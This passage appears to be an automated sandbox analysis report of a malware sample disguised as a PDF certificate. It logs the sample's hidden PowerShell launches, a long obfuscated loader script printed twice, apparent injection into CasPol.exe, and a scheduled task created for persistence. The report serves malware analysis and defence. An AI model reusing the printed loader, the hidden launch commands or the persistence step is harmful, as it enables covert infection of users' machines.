UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4FJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"Jump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
      Source: Certificate#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: !x""f.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: !indows\System.pdbpdbtem.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: !em.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000004.00000002.24024306894.000000000C1E3000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((fkp $Complementing $rosiners4), (GDT @([Int32], [Int32], [Int32], [Int32], [Int32], [Int32]) ([Int32])))$Indfrselstolds = ([AppDomain]::CurrentDomain.GetAssemblies() | W
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skrmarbejdes8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skrmarbejdes9, $false).DefineType($rosiners
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 